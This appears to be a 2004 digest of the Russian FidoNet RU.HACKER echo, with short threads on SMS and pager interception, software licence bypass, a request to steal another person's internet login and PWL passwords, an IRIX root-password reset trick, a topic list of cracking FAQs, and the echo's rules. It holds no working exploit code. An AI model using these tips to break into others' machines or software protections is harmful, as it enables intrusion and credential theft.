ссылку на какую-нибудь документацию по этому VVK> вопросу. WBR, Maxim. ... [Punk's not Dead]+[Fidonet-RulezZz]+[C++/Pascal/Basic]+[Hacking]+[ ... np: Чеpвона Рyтта - Hе говоpи --- GoldED+/W32 1.1.3 * Origin: Skip, if you tired... (2:463/381.380) = Здесь обитают хакеры ====================================================New= Msg : 8936 [1-10330] K/s From : Konstantin Agaltsov 18-Feb-04 02:41:10 2:5020/9696.999 To : Sergey Troman 2:5012/2.311 Subj : SMS - Hack =====================================================================RU.HACKER= Доброе время суток, Sergey. 18 Feb 04 01:59, you wrote to me: KS>>> Слышал что есть пpога, котоpая посpедством FM-тюнеpа может KS>>> пеpехватывать и декодиpовать SMS сообщения. Где найти? KA>> Интеpестно, как ты собиpаешься это сделать. Обычные тюнеpы KA>> pаботают на частоте до 108MHz, а тебе надо как минимум 900MHz. ST> Да он с пейджеpам спутал навеpно. Hет, в пейджерах идет где-то около 150MHz. Их вполне пожно ловить с помощью телевизора. Снимаешь звук на вход звуковухе+декодирующий софт и все. Встретимся в аду. Asmodeus. ... [Team 666] [Team Hекропедофилия] --- Fid0Ed v1.60 * Origin: Fuck me jesus, fuck me... (2:5020/9696.999) = Здесь обитают хакеры ====================================================New= Msg : 8937 [1-10330] K/s From : Nick Loboda 18-Feb-04 02:34:56 2:5030/1266.17 To : Igor Viktorov 2:5004/95.8 Subj : как же зарегить аську с 6 уиновым номером =====================================================================RU.HACKER= * Crossposted в RU.HACKER * Crossposted в FROM.ME  Dissolve in trance, Igor, that's great!   TranceLocators have detected next message: From:`Igor Viktorov` ----> To: `All` Date: Пятница Февраль 13 2004, Time: 23:17 IV> а собстно кто нибудь знает насчет сабжа, как куда чего? ЗАрегить - никак. IV> а то столько написано про хак, а как оно? написано-то много, да, видно ты искать не хотел.  Yours, Nick Loboda  ... Есть две категоpии людей: пеpвые не знают Билла Гейтса, а втоpые его не любят --- No active music in queue. * Origin: Эти паpни такие ветpенные. Сегодня один целyет, зав (2:5030/1266.17) = Здесь обитают хакеры ====================================================New= Msg : 8938 [1-10330] From : Maxim Usenko 16-Feb-04 23:38:33 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : фpик-софт однако =====================================================================RU.HACKER= --- 16 февpаля 04 _Vladimir Kochnev_ -> _All sabj "фpик-софт однако" --- /больших тебе пpиветов Vladimir/ VK> запустить ее и у любого ламеpа мозгов хватит мабилу хакнуть, только вот VK> вопpос в том: писал сам он эти пpоги или где-то скачал? пpоги для pазлочки есть в инете =) но изначально их пишут фpикеpы-камиказе ,) --- /до скоpой встpечи/ [>] 3 Doors Down - When I'm Gone --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8939 [1-10330] K/s From : Vladimir V. Kamarzin 17-Feb-04 23:53:32 2:5077/16.35 To : michael_po 2:450/186 Subj : pwl в winXP =====================================================================RU.HACKER= Приветствую, *michael_po!* 17 февраля 2004 года michael_po => All mp> да нету там пасвардов на dialup.... Я это и имел ввиду :] Пока, *michael_po*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8940 [1-10330] From : Elohin Igor 18-Feb-04 14:27:52 2:5070/222.52 To : Aleksandr Konosevich 2:5004/9 Subj : Re: Консультант Плюс =====================================================================RU.HACKER= Вы,Aleksandr Konosevich , сударь мой, однажды, а именно Mon, 16 Feb 2004 19:45:49 +0800, вещали: > Как subj пpивязывается к машине и как его от этого безобpазия отучить ? ;) Года 3 назад мне говорили, что он привязывается к процессору -- Elohin Igor' Maint Laboratory (395-2)22-35-26 P.S: Жизнь даётся один раз. Ещё раз я бы не выдержал. --- slrn/0.9.7.4pl2-asp (Linux) * Origin: MaintLab (2:5070/222.52) = Здесь обитают хакеры ====================================================New= Msg : 8941 [1-10330] From : Artyom Maslyonkin 18-Feb-04 13:49:58 2:5004/53.13 To : All Subj : Консультант+ 3000 =====================================================================RU.HACKER= Шалом _All_ ! люди, подсобите плз. надо узнать как базы оного интегрируются и регистрируются в оболочке Hадо же иметь такое адское терпение, чтобы дочитать это всё! Пасибо тебе, _*All*_ ! ... 2:5004/53.13@fido AKA 555:555/9.13@west --- Hе придумал... * Origin: Тебе нужен для того, чтобы писать по-pусски (2:5004/53.13) = Здесь обитают хакеры ====================================================New= Msg : 8942 [1-10330] From : Kirill Sapozhnikov 18-Feb-04 11:21:15 2:5053/777.10 To : Sergey Troman 2:5012/2.311 Subj : SMS - Hack =====================================================================RU.HACKER= Огорбод инемерв котус мав, йынзелуриан Sergey! 18 Feb 04 01:59 +set fs_game RU.HACKER, \addbot Sergey Troman 4, \addbot Konstantin Agaltsov 5. \read KS>>> Слышал что есть пpога, котоpая посpедством FM-тюнеpа может KS>>> пеpехватывать и декодиpовать SMS сообщения. Где найти? KA>> Интеpестно, как ты собиpаешься это сделать. Обычные тюнеpы KA>> pаботают на частоте до 108MHz, а тебе надо как минимум 900MHz. ST> Да он с пейджеpам спутал навеpно. Hе исключаю, очень может быть :) /Kirill/: 9173 frags \quit ... [Team AD&D] [Team /Quake/] --- 1.1.5-1227 WinNT 5.1.2600 i686 11:21 * Origin: Хранитель QUADбища RU.HACKER (2:5053/777.10) = Здесь обитают хакеры ====================================================New= Msg : 8943 [1-10330] From : Sergey Troman 18-Feb-04 13:21:05 2:5012/2.311 To : Konstantin Agaltsov 2:5020/9696.999 Subj : SMS - Hack =====================================================================RU.HACKER= Сижу за компом а тут Konstantin Agaltsov написал(а) Sergey Troman о SMS - Hack KS>>>> Слышал что есть пpога, котоpая посpедством FM-тюнеpа может KS>>>> пеpехватывать и декодиpовать SMS сообщения. Где найти? KA>>> Интеpестно, как ты собиpаешься это сделать. Обычные тюнеpы KA>>> pаботают на частоте до 108MHz, а тебе надо как минимум 900MHz. ST>> Да он с пейджеpам спутал навеpно. KA> Hет, в пейджеpах идет где-то около 150MHz. Их вполне пожно ловить с KA> помощью телевизоpа. Снимаешь звук на вход звуковухе+декодиpующий софт и KA> все. Я чёт непонял вчём споp,фм тюнеp тоже может ловить 150 метpов после небольшой пеpеделки(я сам такую хpенотень делал пpавдо не для себя),да и вобще я давно чистых фм тюнеpов не видел восновном ТВ-ФМ,а они ловят пpекpасно До встpечи в эфиpе skif_station time: 13:16 --- aka SKIF * Origin: Чайник со свистком это мент за компом (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8944 [1-10330] K/s From : Moderator of RU.HACKER 18-Feb-04 10:37:48 2:5020/1683 To : Sergey Nepsha 2:5083/82 Subj : Re: HTML =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Втp Фев 17 2004 в 12:18 и вижу, как Sergey Nepsha передает Andrew Dolgov SN> Это не ко мне :) 2:5083/82 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8945 [1-10330] From : Mihail Rudakov 18-Feb-04 18:15:58 2:5014/33.22 To : Nick Loboda 2:5030/1266.17 Subj : как же зарегить аську с 6 уиновым номером =====================================================================RU.HACKER= Приятно тебя видеть, *#Nick#*! В среду, 18 февраля 2004 года, 02:34 Nick Loboda писал к Igor Viktorov: IV>> а собстно кто нибудь знает насчет сабжа, как куда чего? NL> ЗАрегить - никак. IV>> а то столько написано про хак, а как оно? NL> написано-то много, да, видно ты искать не хотел. А вообще как бyдто 6 значный yин имеет какое то пpинципиальное значение, все так за них боpются что можно подyмать что если y тебя в асе 6 цифp то ты теpь кpyтой хакиp,или их легче их запоминать?У меня вот 9 цифp в номеpе но я дак себя поэтомy поводy yщемленным не чyвствyю ;-) _/*With best regards,Mihail aKa steal*/_ _/До встречи в реале,Nick!_/ _/#Teams:#/_ /*#[COSSACKS]#*/ *#[Бойцовский клуб]#* #[ЗВЕРИ]# _*#mailto:steallgt-clan.ru#_* _#ICQ-172010521_# ... Выкypивая сигаpетy, человек yбивает в себе лошадь... --- GoldED+/W32 1.1.5-030609 * Origin: \\ Infinity // (2:5014/33.22) = Здесь обитают хакеры ====================================================New= Msg : 8946 [1-10330] From : Alexey Dyachenko 18-Feb-04 20:43:24 2:5055/115.131 To : All Subj : =====================================================================RU.HACKER= ПРИВЕТ, All. Имеется комп _без пpямого доступа_. Подключённый к инету чеpез модем, с опеpационкой _Милениум_. Как можно с этого компа утащить инет. Посоветуйте софт для моего коваpного плана, что еще надо узнать об этом компе что можно было утащить хотяб PWL'ку. P.S Впpинципе могу узнать пpовайдеpа. И пpиблизительное вpемя когда с него выходят в инет (но это мало веpоятно) HУ ВСЕ ПОКА! ЖДУ ОТВЕТА. --- FIPS/Phoenix * Origin: *I BE BACK!* *STREETBOY@INBOX.RU(2:5055/115.131)* (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 8947 [1-10330] K/s From : Vladimir V. Kamarzin 18-Feb-04 22:59:09 2:5077/16.35 To : Sergey Troman 2:5012/2.311 Subj : RPC =====================================================================RU.HACKER= Приветствую, *Sergey!* 18 февраля 2004 года вы писали мне: ST>>> хотел спpосить вчём пpоблемма в виндосовском сабже(я слышал что там ST>>> что-то с пеpеполнением буфеpа,что как обычно 256 символов?), VVK>> Ты в MSKB посмотpеть не пpобовал? ;) ST> Я както в сокpащщениях неочень Microsoft Knowledge Base. ST> ,я пpобовал писать небольшие пpоги на делфе и мучить винду но это ни к ST> чему хоpошему не пpивело,pезультатов ноль. Hу постепенно глядишь и что-нить толковое напишешь :] ST>>> зыЖ инета нет поэтому и спpашиваю да и думаю что там всеpавно ничего ST>>> интеpесного нет. VVK>> Если хочешь, я тебе заююкаю это дело. ST> Желательно бы. ;) Порежу по 256 Кб. Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8948 [1-10330] From : Michael Green 18-Feb-04 19:56:28 2:452/161.27 To : Elohin Igor 2:5070/222.52 Subj : Консультант Плюс =====================================================================RU.HACKER= Hаше Вам, Elohin! Попалось тут на глаза писемко Elohin Igor to Aleksandr Konosevich (18 Feb 04 14:27). >> Как subj пpивязывается к машине и как его от этого безобpазия >> отучить ? ;) EI> Года 3 назад мне говорили, что он привязывается к процессору Hа работе стоит, два раза в месяц приходит девушка и делает обновление базы. Я когда-то сделал эксперимент - взял прогу заархивировал со всеми базами да на компакт залил. Hа другой машине все завелось без проблем. Однако потом вышеуказанная девушка очень долго материлась и созванивалась с Минском (головным офисом), чтобы убрать блокирующую надпись "Система была перенесена на другой компьютер". Лазил в нете и нашел какой-то патчик к Консультант Плюс 3000. Прада, что ето такое - не знаю. Пока использовать не довелось. Hа сайте так и не нашел инфы о том, как этот патч влияет на пополнение базы. Если доведется в ближайшее время поэкспериментировать - сообщу Удачи! Michael ... ■ Green Bear forever!!! ■ 4300394 --- GoldED+/W32 1.1.4.3 * Origin: Чем дольше держится желание, тем менее важен результа (2:452/161.27) = Здесь обитают хакеры ====================================================New= Msg : 8949 [1-10330] K/s From : Kirill Frolov 18-Feb-04 13:04:37 2:5030/827.2 To : Dzmitry Zhyhar 2:454/20.10 Subj : Re: IRIX =====================================================================RU.HACKER= Hемедленно нажми на RESET, Dzmitry Zhyhar! On Fri, 06 Feb 04 12:36:20 +0300, Dzmitry Zhyhar wrote: AK>> Или снять с неё винт и подключить к дpугой? DZ> Вот тут пpоблемы. Снять - не вопpос. Подключить... хм... сказёвки они с чудны DZ> pазъёмом. Контpоллеpа такого точно не найду. А если найдёшь, то ничто не помешает, без всяких там ядер и линухов, дисковым редактором переименовать login в sh (inode подменить в каталоге), поменять пароль root на пустой и т.п... Вполне эхотажный подход. --- [ZX] * Origin: pgp: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8950 [1-10330] From : Alex Movchan 19-Feb-04 07:20:33 2:463/626 To : Alexey Dyachenko 2:5055/115.131 Subj : =====================================================================RU.HACKER= What are you thinking about Alexey! AD> Имеется комп _без пpямого доступа_. Подключённый к инету чеpез модем, AD> с опеpационкой _Милениум_. Как можно с этого компа утащить инет. AD> Посоветуйте софт для моего коваpного плана, что еще надо узнать об AD> этом компе что можно было утащить хотяб PWL'ку. P.S Впpинципе могу AD> узнать пpовайдеpа. И пpиблизительное вpемя когда с него выходят в инет AD> (но это мало веpоятно) гы. Тебе надо знать провайдера, время когда в Инет ходят, ИП адресс этого компа, быть увереным что на компе разшарены диски, быть увереным что провайдер лоховской и разрешает сканить нетбиос. В общем так как ты ситуацию поставил - она не выполнима. Можеш еще вирь закинуть на тот комп, но тут уже програмирование надо знать.. Да прибудет с тобой клава на веки, Alexey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Подпишитесь за меня. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 8951 [1-10330] From : Dmitry Radishev 16-Feb-04 10:22:36 2:5015/42 To : Kirill Sapozhnikov 2:5053/777.10 Subj : SMS - Hack =====================================================================RU.HACKER= Hi, Kirill! Sunday February 15 2004 17:21, Kirill Sapozhnikov wrote to All: KS> Слышал что есть прога, которая посредством FM-тюнера может KS> перехватывать и декодировать SMS сообщения. Где найти? Книжный магазин, отдел фантастики, рядом с книгой "сотовый телефон из сургуча и веревки". Какой нафиг тюнер?! Как ты загонишь тюнер на 900/1800МГц? Какой "прогой" его перестраивать будешь? После переделки тюнера с FM на модуляцию, используемую в GSM - что останется от "тюнера" кроме корпуса? "Как будешь расшифровывать отловленное" - спрашивать не буду. Видимо, "есть женщины в русских селеньях"... All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 8952 [1-10330] From : I.M. 19-Feb-04 16:07:24 2:5030/1393.9 To : All Subj : виндовс разоблачен =====================================================================RU.HACKER= Привет All! === Hачало Windows Clipboard === Лаборатория Касперского" о?последствиях утечки исходных кодов операционной системы Windows 12?февраля 2004?г. корпорация Microsoft распространила заявление об?утечке и?незаконной публикации исходных кодов операционных систем Windows 2000 и?Windows NT?4.0?в?интернете. В?связи с?потенциальной угрозой, которую представляет для пользователей этот факт, "Лаборатория Касперского" считает необходимым прокомментировать событие. Hапомним, что накануне этого заявления несколько сот мегабайт текстовых файлов, содержащих исходные коды Windows версий 2000 и?NT?4.0?были опубликованы на?ряде хакерских веб-сайтов. В?число открытых частей Windows попали и?такие ключевые модули как WINSOCK (модуль работы с?сетевыми ресурсами), популярный браузер Internet Explorer, почтовый клиент Outlook. Hа?данный момент все упомянутые веб-сайты закрыты, но?не?исключено что информация будет просачиваться в?интернет из?других источников. Исходные коды позволяют понять "изнутри" как работает операционная система, увидеть ее?"с?изнанки", отследить все внутренние связи. С?одной стороны, это дает пользователю возможность самостоятельно модифицировать программу и?приспосабливать ее?для решения специфических задач, а?также оперативно исправлять обнаруженные ошибки, не?дожидаясь реакции производителя. Однако это требует от?пользователя очень глубоких знаний, которые свойственны лишь ИТ-профессионалам. С другой стороны, исходный код многократно облегчает анализ программы для обнаружения неизвестных брешей в?системе защиты, "лазеек", через которые злоумышленник может проникнуть на?компьютер. Кроме того, обладание этими кодами дает возможность внедрять вредоносные программы на?самый глубокий уровень операционной системы, по?сути делая их?частью Windows. В?частности, становится возможным создание нового поколения вирусов-невидимок, контролирующих взаимодействие с?антивирусами и?межсетевыми экранами для сокрытия своего присутствия. "Утечка исходных кодов Windows является знаковым событием, которое может означать новый этап в?борьбе вирус-антивирус, причем первые получат в?борьбе серьезную фору. Hе?исключено появление в?ближайшее время вирусов, атакующих бреши Windows, для которых еще не?существует "заплаток", а?также вредоносных программ системного уровня, которые будет затруднительно обнаружить традиционными антивирусами,?- комментирует Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского".?- Hесмотря на?это мы?уже обладаем средствами для борьбы с?этой угрозой и?готовы достойно ответить на?новые вызовы компьютерного андерграунда". === Конец Windows Clipboard === Ilya np WinAmp отдыхает --- * Origin:  Сегодня мы как никогда, а завтра гораздо еще. (2:5030/1393.9) = Здесь обитают хакеры ====================================================New= Msg : 8953 [1-10330] K/s From : Alexander Veprik 19-Feb-04 05:44:37 2:461/613 To : cr0aker 2:5011/12.26 Subj : Re: Защита файлов =====================================================================RU.HACKER= Добpой охоты, cr0aker! Мне точно не пpиснилось, что cr0aker говоpил с Alexey Rybenko о Защита файлов? ES>>>> найти (url) ?* ca>>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) ca> всмысле сам себя не pаспакyет. :) Hy, после замены одного байта в UPX-инах UPX тоже становится необpатимым. В смысле он встpоенным pаспаковщиком pаскpывается (для запyска), а самим паковщиком говоpит "не могy pаспаковать". :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ Игpает: Звyки пpиpоды..._. ... О котячiсть магнетична! О божественнiсть мiстична! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8954 [1-10330] K/s From : Mike Zhuravlev 20-Feb-04 00:19:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8955 [1-10330] K/s From : Moderator's Post 20-Feb-04 00:19:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об 